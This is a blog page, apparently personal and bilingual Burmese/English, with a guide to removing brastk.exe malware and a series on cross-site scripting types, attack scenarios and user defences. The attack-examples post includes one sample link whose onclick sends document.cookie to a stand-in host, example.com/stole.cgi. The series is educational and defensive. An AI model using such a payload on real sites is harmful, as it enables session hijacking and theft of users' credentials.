ကျွန်တော်ချစ်သောသူငယ်ချင်းများအတွက်
...: ပညာရေး၊စီးပွားရေး၊ ဘာသာရေး၊ ဂီတ၊ ရုပ်ရှင်၊ စာပေ၊ နည်းပညာ၊ အိုင်တီ၊ ကူးယူရန်ဆော့ဖ်ဝဲလ်များနဲ့ အခြားနေရာများကို ဒီနေရာလေးကနေ ဝေမျှပေးလိုက်ပါတယ် :...

... BE PEACEFUL AND HAPPY ALL THE MOMENTS, ALL MY FRIENDS ...

Showing posts with label Computer များရဲ့ဂယ်ပေါက်များ. Show all posts
Showing posts with label Computer များရဲ့ဂယ်ပေါက်များ. Show all posts

Nov 28, 2008

Killing and Removing Brastk.exe Malware

"Brastk.exe" (this link will open Google search with brastk.exe keyword) is a malware program and it stay in the following directories, and many paths of the registry.
C:Windows\
C:Windows\System32\
When a PC is infected with this malware,
- it appear in system tray with red icon with X,
- frequently display of a message, that The system is infected with a virus ... .
- if we click that message, then it tries to install "XP Antispyware 2009" (also a fake antispyware).
So it is very annoyed to infected PC and user.
To remove this malware from the infected pc, I used the following tools and techniques.

Tools

  1. TCPView (this link to SysInternal and will open in new window) to check all the open ports.
  2. Revo Uninstaller (this link to Revo Uninstaller Download page and will open in new window) to check and remove all "Auto Run" files and other unnecessary files.
  3. Hijackthis (this is direct download link to HijackThis and will open in new window) to check the contents of key areas of the Registry and hard drive--areas that are used by both legitimate programmers and hijackers.
  4. Malwarebytes' Anti-Malware program (this link to MBAM Download page and will open in new window) to check all malware finally.

Techniques

  1. Disable network connection.
  2. Run the Registry and look for the “brastk.exe”, all its paths and keys, and delete all.
  3. Find and delete the “brastk.exe” under C:\Windows\directory
  4. Used the tool “TCPView” to check all the open ports of infected PC. This “Brastk.exe” used, UDP port 1025. Then selected the process of “brastk.exe”, and use “End Process…” command from Process menu of the TCPView. This “brastk.exe” program run away at once from system tray.
After Killing the “brastk.exe” with TCPView,
  1. Delete the “brastk.exe” under C:\Windows\system32\ directory.
  2. Clean all temp files from %tmp%, %temp% and %prefetch%.
  3. Run Revo Uninstaller to check all start up files and unwanted files.
  4. Run Hijackthis and check all key areas of the Registry and hard drive again.
  5. Use Malwarebytes' Anti-Malware program to recheck all the rest of malware threats.
  6. Finally, Restart the infected PC and check again.
Now everything will be OK on the infected PC.
Any new ways and comments for this solutions are welcome.

Jul 22, 2007

XSS သို့မဟုတ် Cross-Site Scripting - ကာကွယ်နည်းများ


XSS သို့မဟုတ် Cross-Site Scripting ရန်မှ ကာကွယ်မှုကို ဆောင်ရွက်သည့်အခါ Web Developer များဘက်မှ ၄င်းတို့၏ Web Site ကို XSS ပျော့ကွက်များ ဖြစ်ပေါ်မလာအောင် လိုအပ်သော အကာအကွယ်များဖန်တီးခြင်း၊ User များမှ ထည့်သွင်းလိုက်သော အချက်အလက်များကို စိစစ် လက်ခံခြင်း အစရှိသည့် ဆောင်ရွက်မှုများကို ပြုလုပ်ရသည်။ ထိုအပိုင်းကို ချန်ထားခဲ့ပြီး အင်တာနက် သုံးသူတစ်ဦး အနေဖြင့် XSS အန္တရာယ်မှ မည်သို့ အကာအကွယ်ပြုရမည်၊ ရှောင်တိမ်းရမည်ကို အဓိက ဖော်ပြသွားမည် ဖြစ်သည် -

၁. အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ ရွေးချယ်ခြင်း
အင်တာနက်ထဲတွင်လျှောက်သွားစဉ် မိမိအတွက် လုံခြုံမှုရှိစေရန် အကာအကွယ်ဖန်တီးသည့်အခါ တစ်ခုတည်းသော အရေးအကြီးဆုံး အရာမှာ မိမိအသုံးပြုမည့် အင်တာနက်ကြည့်ဆော့ဖ်ဝဲကို ရွေးချယ်ခြင်း ဖြစ်သည်။ အင်တာနက် သုံးသူ အများစုသည် အများအားဖြင့် အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ တစ်ခုထက် ပို၍ အသုံးပြုလေ့ရှိကြပြီး Website တစ်ခုကို ကြည့်သည့်အခါ ဆော့ဖ်ဝဲ တစ်ခုဖြင့် အဆင်မပြေလျှင် နောက်တစ်ခုဖြင့် ပြောင်းသုံးလေ့ ရှိကြသည်။ ဆော့ဖ်ဝဲ ရွေးချယ်သည့်အခါ သတိထားရမည့် အချက်တစ်ခုမှာ - တိုက်ခိုက်မှုများသည် အင်တာနက်သုံးနေသူ အများစုကို ပစ်မှတ်ထားသည် - ဟူသော အချက် ဖြစ်သည်။ လတ်တလော အခြေအနေတွင် Firefox ဆော့ဖ်ဝဲမှာ လူသုံးများသည့် ဆော့ဖ်ဝဲများထဲတွင် “ ပိုမို လုံခြုံသော ” အနေအထား တွင်ရှိပြီး၊ တိုက်ခိုက်သူများ၏ အဓိက ပစ်မှတ်မှာ မိုက္ကရိုဆော့ဖ်၏ Internet Explorer ဖြစ်နေသည်။ ထို့ပြင် Mozilla, Netscape, Opera, နှင့် Safari တို့ကိုလည်း ရွေးချယ် အသုံးပြုနိုင်သေးသည်။

-စိတ်ချစွာ အသုံးပြုနိုင်မည့် အင်တာနက်ကြည့် ဆော့ဖ်ဝဲ တစ်ခု (သို့) နှစ်ခုကို ရွေးပါ။


၂. အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ ကို ပိုမိုလုံခြုံအောင် ဖန်တီးခြင်း
မည်သည့် အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ ကိုရွေးချယ် အသုံးပြုသည်ဖြစ်စေ ၄င်းတို့ အတွက် အကာအကွယ်ပေးမည့် ပရိုဂရမ်များ နှင့် ကိရိယာ (Tools) များကို ထပ်မံပေါင်းစပ်ပေးခြင်းဖြင့် အင်တာနက်ကြည့် ဆော့ဖ်ဝဲကို ပိုမို လုံခြုံလာအောင် ဖန်တီးနိုင်သည်။

  • Firefox အတွက် - NoScript , SafeHistory, SafeCache,
  • Internet Explorer အတွက် - eBay Toolbar
  • Firefox/Internet Explorer နှစ်မျိုးလုံးအတွက် Netcraft Anti-Phishing Toolbar, Google Toolbar စသည်တို့မှာ -
လုံခြုံမှုကိုများစွာ အထောက်အပံ့ပေးနိုင်သည့် ကိရိယာများ ဖြစ်ကြသည်။
၎င်းတို့သည် သီးခြား ထည့်သွင်းပေးရသည့် ပရိုဂရမ်များ (Add-ons) များဖြစ်ပြီး -
  • Phishing web site များကို ဖော်ထုတ်ပေးခြင်း၊
  • web site များ၏ အချို့သော အင်္ဂါရပ်များ (Features)ကို ရပ်တန့်ပေးထားခြင်း၊
  • အင်တာနက်သုံးသူများ၏ စကားဝှက် စသည်များကို မသက်ဆိုင်သူများ လက်ထဲသို့ မရောက်အောင် ထိန်းသိမ်းကာကွယ်ပေးခြင်းနှင့်
  • အခြားသော အသုံးဝင်သည့် အကာအကွယ် အမျိုးမျိုးကို ရရှိစေသည်။
Phishing - အီးမေးလ် ကိုအသုံးပြုပြီး အင်တာနက်သုံးသူတစ်ဦးကို အင်တာနက်နေရာ( Web site) အတု တစ်ခုသို့ ရောက်လာအောင်ဖန်တီးကာ credit card, social security, bank စာရင်းအမှတ် စသည့် အရေးကြီးသော အချက်အလက်များကို လှည့်ဖျားရယူသည့် အင်တာနက် ရာဇ၀တ်မှု တစ်မျိုး။
      1. NoScript - https://addons.mozilla.org/firefox/722/
      2. SafeHistory - www.safehistory.com/
      3. SafeCache - www.safecache.com/
      4. Netcraft Anti-Phishing Toolbar -http://toolbar.netcraft.com/
      5. eBay Toolbar -http://pages.ebay.com/ebay_toolbar/
      6. Google Toolbar - www.google.com/tools/firefox/toolbar/index.html

-လိုအပ်သော ပရိုဂရမ်များ နှင့် ကိရိယာများ ထပ်မံပေါင်းထည့်ပေးပါ။



၃. အချို့သော အင်္ဂါရပ်များကို ရပ်တန့်ထားခြင်း
အရိုးစင်းဆုံးပြောရလျှင် အင်္ဂါရပ် (Features) အချို့ကိုသာ အလုပ်လုပ်စေခြင်းသည် အင်တာနက်ထဲတွင် သွားလာရသည့်အခါ ပိုမို စိတ်ချ လုံခြုံသည့် အနေအထားကို ဖြစ်ပေါ်စေသည်။ ပြောရလျှင် JavaScript, Java, Active X, JScript, VBScript,Flash, နှင့် QuickTime တို့အားလုံးမှာ အန္တရာယ်ပေးနိုင်သည့် အရာများ ဖြစ်သည်။ ၄င်းနည်းပညာများသည် အင်တာနက်လူဆိုးများအတွက် လက်နက်ပုံစံသစ်များ ဖြစ်လာ ကြသည်။ မကောင်းသော အချက်တစ်ခုမှာ အဆိုပါ အင်္ဂါရပ်များကို အလုပ်မလုပ်နိုင်အောင် ရပ်တန့်ထား ခြင်းသည် အချို့သော Web site များ၏ အလုပ်လုပ်မှု အနေအထားကို ရပ်တန့်စေခြင်း၊ တ၀က်တပျက်သာ အလုပ်လုပ်စေခြင်း စသည်တို့ ဖြစ်ပေါ်လာစေနိုင်သည်။
မည်သို့ပင် ဖြစ်စေ ၄င်းတို့ကိုရပ်တန့်ထားခြင်းက ပို၍ အကျိုးများစေသည်။ ထို့ကြောင့် အချို့သော အင်တာနက်ကြည့်ဆော့ဖ်ဝဲများ နှင့် ၄င်းတို့၏ နောက်ဆက်တွဲများ (Extensions) သည် အထက်တွင်ဖော်ပြခဲ့သည့် အင်္ဂါရပ်များကို လိုအပ်သလို ဖွင့်/ပိတ်ခြင်းများကို အလျင် အမြန် ဆောင်ရွက်ပေးနိုင် အောင်ဖန်တီးထားခြင်းဖြစ်သည်။

-အန္တရာယ်ပေးနိုင်သော အချို့အရာများ (JavaScript, Java, Active X, JScript, VBScript, Flash, နှင့် QuickTime) ကို မဖြစ်မနေ လိုအပ်မှသာ အလုပ်လုပ်ပါစေ။ မလိုအပ်က ရပ်ထားပါ။


၎. ကွန်ပျုတာ စက်အတု (Virtual Machine) တစ်ခုကို သုံးခြင်း
ယခုအခါ ကွန်ပျုတာ စက်အတု (Virtual Machine) ကဲ့သို့သော အတုဖန်တီးထားသည့် နေရာများမှတဆင့် အင်တာနက်ကို အသုံးပြုနေသူများ တနေ့ထက်တနေ့ တိုးတက် များပြားလာနေပြီ ဖြစ်သည်။ အကယ်၍ အခြေအနေ တစ်ခုခု ထူးခြားမှုဖြစ်ပေါ်လာပါက စက်အတုထဲတွင်သာ ပြဿနာ တက်မည်ဖြစ်ပြီး ပင်မ ကွန်ပျုတာကို ထိခိုက်မှု မရှိနိုင်ပေ။
ကွန်ပျုတာ စက်အတု (Virtual Machine) - တကယ့် ကွန်ပျုတာတစ်လုံးကဲ့သို့ အလုပ်လုပ်ပေးနိုင်သော ကွန်ပျုတာ ဆော့ဖ်ဝဲတစ်မျိုး၊ Operating System တစ်ခု ထည့်သွင်းတပ်ဆင်ပေးရသည်။ အခြားသော ဆော့ဖ်ဝဲများလည်း ထည့်သွင်းနိုင်သည်။
-မိမိအကျွမ်းတ၀င်မရှိသော Web site များ၊ ဆော့ဖ်ဝဲများကို စမ်းသပ် အသုံးပြုရသည့်အခါ ဘေးကင်းစေရန် အတွက် ကွန်ပျုတာ စက်အတု (Virtual Machine) ကို အသုံးပြုပါ။


၅. အီးမေးလ် အတွင်းရှိ အင်တာနက် လိပ်စာများကို ဘယ်တော့မှ ကလစ်မလုပ်ပါနှင့်
အီးမေးလ်အတွင်းပါဝင်လာသည့် -
  • လိပ်စာနှင့် အင်တာနက်နေရာများ၊
  • ရုပ်ပုံများ ကို တတ်နိုင်သမျှ မည်သည့် အချိန်တွင်မှ ကလစ်မလုပ်ပါနှင့်။
  • ၄င်းလိပ်စာများသည်ပင် အန္တရာယ်ဖြစ်နေပြီး၊
  • Phishing အီးမေလ်များကို ရှာဖွေ ဖော်ထုတ်နိုင်ရန်မှာလည်းခက်ခဲသည်။
အကယ်၍ အီးမေးလ်တစ်စောင်သည် အစစ်အမှန်ဖြစ်ကြောင်း မသေချာပါက၊ ဆောင်ရွက်နိုင်သည့် အကောင်းဆုံးနည်းမှာ ပေးထားသော လိပ်စာကို အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ၏ လိပ်စာဖေါ်ပြသည့်နေရာတွင် ကိုယ်တိုင်ရိုက်ပြီး ထည့်သွင်းခြင်းဖြစ်သည်။ ဤနည်းအားဖြင့် မိမိရောက်သွားမည့်နေရာသည် အစစ်အမှန်နေရာတစ်ခု ဖြစ်ကြောင်း အတော်အတန် အာမခံချက် ရရှိနိုင်ပေသည်။

ချွင်းချက် တစ်ခုတော့ ထားရှိရမည် ဖြစ်သည်။
ဥပမာအားဖြင့် မိမိ၏လုပ်ဆောင်မှု တစ်ခုကို တုန့်ပြန်ပေးရန် ချက်ချင်း ပေးပို့လာသော အီးမေးလ်များ
(Web site တစ်ခုတွင် မှတ်ပုံတင်ခြင်း၊ စကားဝှက် မေ့သွားခြင်း ကြောင့် ပြန်တောင်းခြင်း/ပြန်ပြင်ခြင်း၊ ကုန်ဝယ်အမှာစာ အတည်ပြုခြင်း .. စသည်) ကို မိနစ်ပိုင်းအတွင်း ပြန်လည် တုန့်ပြန် ဆောင်ရွက်ပေးရသည့် အခါမျိုး အတွက် ဖြစ်သည်။
-မိမိ၏ လိုအပ်ချက်ကြောင့် ချက်ချင်းရောက်လာပြီး ချက်ချင်းတုန့်ပြန်ပေးရမည့် အီးမေးလ်များအတွင်းရှိ လိပ်စာများမှ အပ၊ အခြားမည်သည့် အီးမေးလ်များအတွင်းရှိ လိပ်စာများ၊ ပုံများ ကိုမဆို ကလစ် မလုပ်ပါနှင့်။


၆. မိမိ၏ Web mail ကို ကာကွယ်ထားပါ
လူသန်းပေါင်းများစွာတို့သည် နည်းအမျိုးမျိုးဖြင့် Web mail များကို အသုံးပြုလျက် ရှိနေကြသည်။ ၄င်းကို မိမိ၏ ဘဏ်စာရင်း နံပါတ် ထက်ပင် လျှိုဝှက် သိမ်းဆည်းထားသင့်ပေသည်။ လူပေါင်းများစွာတို့သည် အရေးကြီးသော အင်တာနက် ပေါ်မှ Account များကို Web mail လိပ်စာ တစ်ခုတည်းဖြင့် ရယူ သိမ်းဆည်း ထားတတ်လေ့ရှိကြသည်။ အကယ်၍ တစ်စုံတစ်ယောက်က မိမိ၏ အီးမေးလ်လိပ်စာကို နည်းလမ်းတစ်ခုခုဖြင့် အသုံးပြုနိုင်သွားမည်ဆိုပါက ထိုသူသည် ၄င်းအီးမေးလ်တွင် ချိတ်ဆက်ထားသော အခြားသော Account များကိုပါ သုံးခွင့်ရသွားမည် ဖြစ်သည်။

သင့်အနေဖြင့် ဆောင်ရွက်နိုင်သည့် အကောင်းဆုံးအရာတစ်ခုမှာ -
  • အလွယ်တကူ မခန့်မှန်းနိုင်သော စကားဝှက်မျိုးကို အသုံးပြုခြင်း၊
  • စကားဝှက်များကို အနည်းဆုံး ၃ လတစ်ကြိမ် ပြောင်းလဲခြင်း၊
  • ၄င်းစကားဝှက်ကို အခြားမည်သည့်နေရာတွင်မှ မသုံးခြင်း၊
  • အလုပ်အမျိုးမျိုးအတွက် အီးမေးလ် လိပ်စာ အဆင့်အတန်းအမျိုးမျိုးထားရှိ အသုံးပြုခြင်း တို့ ဖြစ်သည်။
အရေးကြီးသော အချက်အလက်များပါဝင်နေသည့် မည်သည့် အီးမေးလ်ကိုမဆို ဖတ်ရှုပြီးသည့်အခါ ဖျက်ဆီးပစ်လိုက်ခြင်း သည်လည်း ကောင်းမွန်သော လုပ်ဆောင်ချက် တစ်ခု ဖြစ်သည်။
-မိမိ၏ အီးမေးလ် စကားဝှက် ကို ကောင်းစွာ ကာကွယ်ထားပါ။ အရေးကြီးသော အကြောင်းအရာများကို အီးမေးလ် Inbox ထဲတွင် သိမ်းမထားပါနှင့်။ အများနှင့် သက်ဆိုင်သော၊ လူများစုအတွက် ချပေးရမည့် အီးမေးလ်လိပ်စာကို အခြား အရေးကြီးသော နေရာများတွင် မသုံးပါနှင့်။


၇. ရှည်လျားသော အင်တာနက်လိပ်စာများကို သတိထားပါ
အကယ်၍ အင်တာနက်လိပ်စာ တစ်ခုသည် စာကြောင်း တစ်ကြောင်းထက်ပိုမိုရှည်လျားပြီး၊ ရာခိုင်နှုန်း သင်္ကေတများ % ဖြင့် ပြောင်းလဲ ဖော်ပြထားပါက အထူးသတိပြုသင့်သည်။ အကယ်၍ အင်တာနက်လိပ်စာ တစ်ခု၏ သဘာဝ အမှန်ကို မသိပါက ၄င်းတို့ကို မူရင်း သင်္ကေတ အဖြစ် ပြန်ပြောင်းပြီး အတွင်းတွင် HTML သင်္ကေတများ ပါဝင်နေခြင်း ရှိမရှိ စစ်ဆေးပါ။

-HTML သင်္ကေတများ ပါဝင်နေပါက ၄င်းလိပ်စာကို ကလစ်မလုပ်ပါနှင့်။


၈. URL အတိုချုံးပေးသော ၀န်ဆောင်မှုများ
URL အတိုချုံးပေးသော ၀န်ဆောင်မှုများကို သတိထားပါ။ အချို့သော အင်တာနက်လူဆိုးများသည် မိမိတို့၏ ကောက်ကျစ်သော အင်တာနက်လိပ်စာများကို ကွယ်ဝှက်နိုင်ရန်အတွက် TinyURL, snipURL, notlong, shorl, နှင့် doiop တို့ကဲ့သို့သော အင်တာနက်လိပ်စာ ပြောင်းပေးသည့် ၀န်ဆောင်မှုများကို သုံးလေ့ရှိကြသည်။ ထိုကဲ့သို့သော လိပ်စာများကို စစ်ဆေးနိုင်ရန်အတွက် လိုအပ်ပါက Command Line ထဲတွင် ရိုက်ထည့်ပြီး တိုက်ရိုက် စစ်ဆေး ကြည့်နိုင်သည်။ အကယ်၍ လိပ်စာ အစစ်အမှန်ဖြစ်ပါက အမှန်အတိုင်းလမ်းညွှန်မည် ဖြစ်သည်။ ယခုကဲ့သို့ လိပ်စာပြောင်းပေးသော ၀န်ဆောင်မှုများသည်လည်း ၄င်းတို့ထံရောက်လာသော လိပ်စာ မှန်မမှန်ကို အာမခံနိုင်မည် မဟုတ်ပေ။
-ထို့ကြောင့် မည်သည့် နေရာကိုမဆို ကလစ် လုပ်တော့မည်ဆိုပါက အထူးသတိထားရန်လိုမည် ဖြစ်ပေသည်။ မသိသော၊ သံသယရှိနေသော လိပ်စာများကို ကလစ်မလုပ်ပါနှင့်။


သတိပြုစေလိုသည်မှာ - ယခုဖော်ပြထားသော အချက်များ သည်လည်း မိမိတို့ကို အတော်အသင့် မျှသာ အကာအကွယ်ပေးနိုင်မည်ဖြစ်ပြီး ရာနှုန်းပြည့် အကာအကွယ် ပေးနိုင်မှုအတွက် သက်ဆိုင်သူ တစ်ဦးချင်းစီ အနေဖြင့် အမြဲမပြတ် ဆက်လက် လေ့လာသွားရန် အထူးပင် အရေးကြီးလှပါကြောင်း -


REF -
- http://en.wikipedia.org/wiki/Xss
- http://www.cgisecurity.com/articles/xss-faq.shtml
- XSS Attacks - CROSS SITE SCRIPTING EXPLOITS AND DEFENSE by Syngress

Jul 10, 2007

XSS သို့မဟုတ် Cross-Site Scripting -တိုက်ခိုက်မှု နမူနာများ


XSS တိုက်ခိုက်မှု နမူနာများ

XSS ဂယ်ပေါက် အမျိုးမျိုးရှိနေသည့်အတွက် တိုက်ခိုက်သူများ၏ လုပ်ဆောင်ပုံများမှာလည်း အမျိုးမျိုး ဖြစ်လာနိုင်သည်။
တိုက်ခိုက်မှုနမူနာများကို လေ့လာကြည့်ကြပါစို့ ...

အားနည်းချက် (၁)-တိုက်ခိုက်မှု

  1. တိုက်ခိုက်သူသည် သားကောင်ဆီသို့ အီးမေးလ် သို့မဟုတ် အခြားသော နည်းလမ်းတစ်ခု ဖြင့် ကောက်ကျစ်စွာဖန်တီးထားသော အင်တာနက်စာမျက်နှာ တစ်ခုကို ဖွင့်ပေးမည့် အင်တာနက်လိပ်စာ (ဥပမာ - --www.attackexample.com/test/readme.html-- )တစ်ခုကို ပေးပို့လိုက်သည်။
  2. သားကောင်က ထို လိပ်စာကို နှိပ် လိုက်သည်။ (click လုပ်လိုက်သည်။) ဤတွင် တိုက်ခိုက်သူ၏ ဖန်တီးထားသောအင်တာနက် စာမျက်နှာမှာ သားကောင်၏ အင်တာနက်ကြည့်ဆော့ဖ်ဝဲတွင် ပွင့်လာသည်။
  3. တိုက်ခိုက်သူက ကြိုတင်ဖန်တီးထားသည့်အတိုင်းပင် ၄င်းစာမျက်နှာတွင် ပါလာသော JavaScript သင်္ကေတများက သားကောင်၏ ကွန်ပျုတာထဲတွင် ရှိနှင့်နေသော ဟာကွက် ဖြစ်ပေါ်နေသည့် အင်တာနက်စာမျက်နှာ တစ်ခုကို ထပ်ဖွင့်လိုက်ကြသည်။
  4. အဆိုပါ ဟာကွက်ဖြစ်ပေါ်နေသည့် အင်တာနက်စာမျက်နှာထဲတွင် ပါဝင်နေသော JavaScript သင်္ကေတများက သားကောင်၏ ကွန်ပျုတာ ဟာ့ဒ်ဒစ် (Local zone) အတွင်းတွင် ကောင်းစွာ အလုပ်လုပ်နိုင်သည်။
  5. ဤနည်းအားဖြင့် တိုက်ခိုက်သူပေးပို့လိုက်သော ကောက်ကျစ်စွာ ဖန်တီးထားသော သင်္ကေတများသည် သားကောင်၏ ကွန်ပျူတာထဲတွင် ကြိုတင်ရှိနေသော ဟာကွက်ကို အခွင့်ကောင်းယူ အသုံးချလျက် -
    1. အမိန့်ပေးချက်များ ပေးပို့ ခိုင်းစေနိုင်သည်။
    2. အချို့သော ဆော့ဖ်ဝဲများ ပရိုဂရမ်များကို သားကောင်မသိဘဲ တိတ်တဆိတ် အလုပ်လုပ်စေနိုင်သည်။
    3. တိုက်ခိုက်သူထံအချက်အလက်များ ပြန်လည်ပေးပို့နိုင်သည်။
အားနည်းချက် (၂)-တိုက်ခိုက်မှု
  1. ကျော်ကျော်သည် အောင်အောင်တည်ထောင်ထားသော ၀က်ဘ်ဆိုက်တစ်ခုဆီသို့ မကြာခဏ ၀င်ရောက်လည်ပတ်လေ့ ရှိသည်။ ၄င်းဝက်ဘ်ဆိုက်သို့ ၀င်ရောက်နိုင်ရန်အတွက် ကျော်ကျော်သည် Username နှင့် Password တစ်ခုကို အသုံးပြုရသည်။ ၀က်ဘ်ဆိုက် ထဲတွင် ကျော်ကျော်၏ ငွေကြေးဆိုင်ရာ အချက်အလက် များကဲ့သို့သော အရေးကြီး အချက်အလက်များ သိမ်းဆည်းထားသည်။
  2. တိုက်ခိုက်သူတစ်ဦးက အောင်အောင်၏၀က်ဘ်ဆိုက်တွင် “အခြေအနေအပေါ်မူတည်ပြီး ဖြစ်ပေါ်လာသောပျော့ကွက် - Reflected XSS ” တစ်ခု ဖြစ်ပေါ်နေကြောင်း လေ့လာ တွေ့ရှိထားသည်။
  3. တိုက်ခိုက်သူသည် အဆိုပါ အားနည်းချက်ကို အမြတ်ထုတ်နိုင်ရန်အတွက်-
    1. (အောင်အောင်၏ ၀က်ဘ်ဆိုက်လိပ်စာနှင့် ဆင်တူယိုးမှား) အင်တာနက်လိပ်စာအတုတစ်ခုကို ဖန်တီးလိုက်ပြီး ကျော်ကျော်ထံသို့ အီးမေးလ်တစ်စောင်ပေးပို့လိုက်သည်။
    2. ၄င်းအီးမေးလ်ကိုလည်း အောင်အောင့် ထံမှ ပေးပို့သည့်အလား အပြင်အဆင်တူအောင် အားလုံး လှည့်စား ဖန်တီး ထားသည်။
    3. (အင်တာနက် လုံခြုံရေးနယ်ပယ်တွင် ဤနည်းစနစ်ကို အီးမေးလိပ်စာ လှည့်ဖျားခြင်း - e-mail address spoofing ဟု ခေါ်ကြသည်။)
      (ဥပမာ - --www.google.com-- အစား --www.googla.com--, --www.domainname.com အစား --www.domainame.com-- etc)
  4. ကျော်ကျော်သည်-
    1. ( ၄င်းမကြာခဏ အသုံးပြုနေသော အောင်အောင်၏၀က်ဘ်ဆိုက်မှ ပေးပို့သည့်စာ အမှတ်ဖြင့်) တိုက်ခိုက်သူ၏ အီးမေးလ်ကို ဖွင့်ကြည့်ရင်း
    2. အထဲရှိ အင်တာနက်လိပ်စာ အတိုင်း လိုက်သွားကာ အောင်အောင်၏ ၀က်ဘ်ဆိုက်တွင် Log In ပြုလုပ်သည်။
  5. ဤတွင်-
    1. တိုက်ခိုက်သူ ဖန်တီးထားသော အင်တာနက်လိပ်စာ အတုအတွင်း မြုတ်နှံထည့်သွင်း ထားသော မသမာသည့် သင်္ကေတများက
    2. အောင်အောင်၏ ၀က်ဘ်ဆိုက် အတွင်းမှ တိုက်ရိုက်ပေးပို့လိုက်သော သင်္ကေတများ ကဲ့သို့ ဟန်ဆောင်ကာ
    3. ကျော်ကျော်၏ အင်တာနက်ကြည့် ဆော့ဖ်ဝဲအတွင်းတွင် အလုပ်လုပ်တော့သည်။
    4. ကျော်ကျော်မှ အောင်အောင်၏ ၀က်ဘ်ဆိုက် အတွင်းသို့ ၀င်ရောက်နိုင်ရန် ထည့်သွင်းပေးရသော အရေးကြီးသော အချက်အလက်များ (User name, Password, Billing informations .... etc.)ကို ခိုးယူကာ တိုက်ခိုက်သူထံသို့ တိတ်တဆိတ်ပေးပို့ နေတော့သည်။
    5. example - Image taken from Microsoft MSDN libarary for XSS
အားနည်းချက် (၃)-တိုက်ခိုက်မှု
  1. အောင်အောင်သည် ၀က်ဘ်ဆိုက်တစ်ခုကို တည်ထောင်ထားသည်။ ၄င်းဆိုက်ကို အသုံးပြုနေကြသော သူများသည် အခြားသောသူများ ဖတ်ရှုစေနိုင်ရန်အတွက် အသိပေးချက်များနှင့် အခြားအကြောင်းအရာများကို ပေးပို့ခွင့်ရှိကြသည်။( ဥပမာ-အင်တာနက်ပေါ်ရှိ ဖိုရမ်များ)
  2. တိုက်ခိုက်သူ တစ်ဦးသည် အောင်အောင်၏၀က်ဘ်ဆိုက်တွင် XSS အားနည်းချက်(၃) ကို အသုံးပြု၍ တိုက်ခိုက်နိုင်သည့် ပျော့ကွက်ရှိနေကြောင်း သတိထားမိသည်။
  3. တိုက်ခိုက်သူသည် (လူ့တို့၏ စိတ်ဝင်စားတတ်သော သဘာဝကိုကောင်းစွာအသုံးချလျက်) ၀က်ဘ်ဆိုက်သို့ ရောက်လာမည့် အခြားသူများလည်း သေချာပေါက်လာရောက်ကြည့်ရှုမည့် အငြင်းပွားဖွယ်ရာ ဆွေးနွေးငြင်းခုန်စရာ အသိပေးချက်အချို့ကို တင်ထားလိုက်သည်။
  4. ထိုအသိပေးချက်များထဲတွင် တိတ်တဆိတ် မြုတ်နှံထည့်သွင်းထားသော သင်္ကေတများကြောင့်၊ လာရောက်ဖတ်ရှုကြသည့်-
    1. ၄င်းဝက်ဘ်ဆိုက်သို့ လာရောက်လည်ပတ်သောသူများ၏ လတ်တလောအခြေအနေကို သိမ်းဆည်းထားသည့် အချက်အလက်များ (Session cookies) သို့မဟုတ်
    2. အခြားသော အထောက်အထားများ ( User name, password စသည်)ကို ထိုသူများ မသိအောင် တိုက်ခိုက်သူ၏ Web Server ထံသို့ တိတ်တဆိတ် ပေးပို့တော့သည်။
  5. နောက်ပိုင်းတွင် တိုက်ခိုက်သူသည် အခြားသောသူများအမည်ဖြင့် ၀က်ဘ်ဆိုက်ထဲသို့ ၀င် ရောက်ပြီး ထင်ရာလုပ်နိုင်လေသည်။
  6. Session cookie များခိုးယူနိုင်သော နမူနာ သင်္ကေတများ
-< href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;">Click here! < /a >-

ဆက်လက်ဖော်ပြပါမည် ....

REF - http://en.wikipedia.org/wiki/Xss

Jul 6, 2007

XSS သို့မဟုတ် Cross-Site Scripting - အမျိုးအစားများ


အမျိုးအစားများ

အခုအချိန်တွင် XSS ၏အားနည်းချက်များကို အမျိုးအစားသုံးမျိုးဖြင့် ဖော်ပြကြသည်။
၎င်းတို့ကို အခေါ်ရလွယ်စေရန် အားနည်းချက် (၁)(၂)(၃) ဟု အမည်ပေးလိုက်ပါမည်။

အားနည်းချက် (၁)

XSS ၏အားနည်းချက်(၁) ကို DOM-based သို့မဟုတ် Local cross-site scripting ဟုပြောကြသည်။ ပြဿနာက တခြားနေရာမှာ မရှိဘဲ ၄င်းအင်တာနက် စာမျက်နှာအတွင်းမှာပင် ရှိနေသည်။ ဥပမာ - ဆိုကြပါစို့
  • အကယ်၍ JavaScript သင်္ကေတ တစ်ခုသည် အင်တာနက်လိပ်စာ (URL) တစ်ခုကို တောင်းဆိုသည့် ဆောင်ရွက်ချက်တစ်ခုကို ပြုလုပ်ပြီးနောက်
  • ရရှိလာသော အချက်အလက်များကို အသုံးပြုပြီး
  • မူလစာမျက်နှာအတွင်းမှာပင် HTML အချို့ပြန်ရေးလိုက်သည့် အခါမျိုးတွင် XSS ဂယ်ပေါက်(hole) တစ်ခုဖြစ်လာသည်။
လက်တွေ့အားဖြင့် အားနည်းချက်(၁)မှာ (၂)နှင့် အတော်လေးဆင်တူသည်။အလွန်အရေးကြီးသော အချက်တစ်ချက်တွင်သာလျှင် ကွဲလွဲမှုရှိနေသည်။
  • Internet Explorer ဆော့ဖ်ဝဲ၏ Local Zone ဟုခေါ်သော၊ အင်တာနက်သုံးနေသူများ၏ ဟာ့ဒ်ဒစ်အတွင်းရှိ Client-site script များကိုကိုင်တွယ် လုပ်ဆောင်ပုံကြောင့်၊
  • အားနည်းချက်(၁)မှတဆင့် အဝေးမှ ထိမ်းကျောင်းနိုင်သော အနေအထားမျိုးအထိ ဖြစ်သွားစေနိုင်သည်။
ဥပမာ -
  • တိုက်ခိုက်သူတစ်ဦးသည် ကောက်ကျစ်သော ၀က်ဘ်ဆိုက်တစ်ခုကို အသုံးပြုလျက်ရှိနေသည်။
  • ၄င်းဆိုက်တွင် အင်တာနက်သုံးနေသူတစ်ဦး၏ ကွန်ပျုတာအတွင်းရှိ ဂယ်ပေါက်ဖြစ်နေသော စာမျက်နှာတစ်ခုနှင့် ချိတ်ဆက်မှု(Link)တစ်ခုပါဝင်နေသည့် ဆိုပါစို့။
